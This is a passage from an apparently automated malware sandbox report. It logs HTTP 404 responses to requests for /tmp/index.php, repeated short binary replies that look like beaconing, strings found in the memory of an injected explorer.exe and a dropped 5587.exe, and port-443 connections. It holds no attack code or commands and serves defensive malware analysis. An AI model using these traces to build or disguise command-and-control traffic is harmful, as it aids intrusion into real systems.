6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:44:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:44:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:44:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:44:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:44:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:45:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:45:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:45:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:45:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:45:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:45:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:45:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:45:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:46:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:46:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:46:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:46:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:46:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:46:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:46:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:46:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:46:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:46:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:47:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2125710844.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: explorer.exe, 00000002.00000000.2121615024.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2125710844.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2125710844.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2125710844.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: explorer.exe, 00000002.00000000.2125710844.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
    Source: explorer.exe, 00000002.00000000.2125224128.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2124496825.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2125190406.0000000008870000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
    Source: explorer.exe, 00000002.00000000.2132312933.000000000C860000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
    Source: 5587.exe, 5587.exe.2.drString found in binary or memory: http://www.oberhumer.com
    Source: explorer.exe, 00000002.00000000.2130995903.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
    Source: explorer.exe, 00000002.00000000.2123656424.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000002.00000000.2123656424.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000002.00000000.2122622275.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
    Source: explorer.exe, 00000002.00000000.2130995903.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
    Source: explorer.exe, 00000002.00000000.2125710844.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
    Source: explorer.exe, 00000002.00000000.2125710844.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57809
    Source: unknownNetwork traffic detected: HTTP traffic on port 57848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57805
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57807
    Source: unknownNetwork traffic detected: HTTP traffic on port 57825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57802
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57801
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57889
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57804
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57803
    Source: unknownNetwork traffic detected: HTTP traffic on port 57797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57885
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57800
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57888
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57887
    Source: unknownNetwork traffic detected: HTTP traffic on port 57811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57893
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57892
    Source: unknownNetwork traffic detected: HTTP traffic on port 57857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57895
    Source: unknownNetwork traffic detected: HTTP traffic on port 57883 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57891
    Source: unknownNetwork traffic detected: HTTP traffic on port 57834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57818
    Source: unknownNetwork traffic detected: HTTP traffic on port 57843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57813
    Source: unknownNetwork traffic detected: HTTP traffic on port 57816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57815
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57814
    Source: unknownNetwork traffic detected: HTTP traffic on port 57868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57896
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57810
    Source: unknownNetwork traffic detected: HTTP traffic on port 57837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57875 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57871 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57828
    Source: unknownNetwork traffic detected: HTTP traffic on port 57852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57829
    Source: unknownNetwork traffic detected: HTTP traffic on port 57795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57823
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57820
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57822
    Source: unknownNetwork traffic detected: HTTP traffic on port 57888 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57821
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57796
    Source: unknownNetwork traffic detected: HTTP traffic on port 57798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57885 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57795
    Source: unknownNetwork traffic detected: HTTP traffic on port 57807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57891 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57839
    Source: unknownNetwork traffic detected: HTTP traffic on port 57818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57837
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57836
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57830
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57833
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57840
    Source: unknownNetwork traffic detected: HTTP traffic on port 57810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57877 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57849
    Source: unknownNetwork traffic detected: HTTP traffic on port 57829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57845
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57847
    Source: unknownNetwork traffic detected: HTTP traffic on port 57867 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57841
    Source: unknownNetwork traffic detected: HTTP traffic on port 57793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57851
    Source: unknownNetwork traffic detected: HTTP traffic on port 57815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57876 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57893 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57857
    Source: unknownNetwork traffic detected: HTTP traffic on port 57830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57859
    Source: unknownNetwork traffic detected: HTTP traffic on port 57864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57855
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57860
    Source: unknownNetwork traffic detected: HTTP traffic on port 57812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57861
    Source: unknownNetwork traffic detected: HTTP traffic on port 57806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57868
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57867
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57869
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57865
    Source: unknownNetwork traffic detected: HTTP traffic on port 57859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57871
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57873
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57872
    Source: unknownNetwork traffic detected: HTTP traffic on port 57881 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57895 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57875
    Source: unknownNetwork traffic detected: HTTP traffic on port 57796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57887 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57877
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57876
    Source: unknownNetwork traffic detected: HTTP traffic on port 57884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57881
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57884
    Source: unknownNetwork traffic detected: HTTP traffic on port 57799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57883
    Source: unknownNetwork traffic detected: HTTP traffic on port 57856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57880
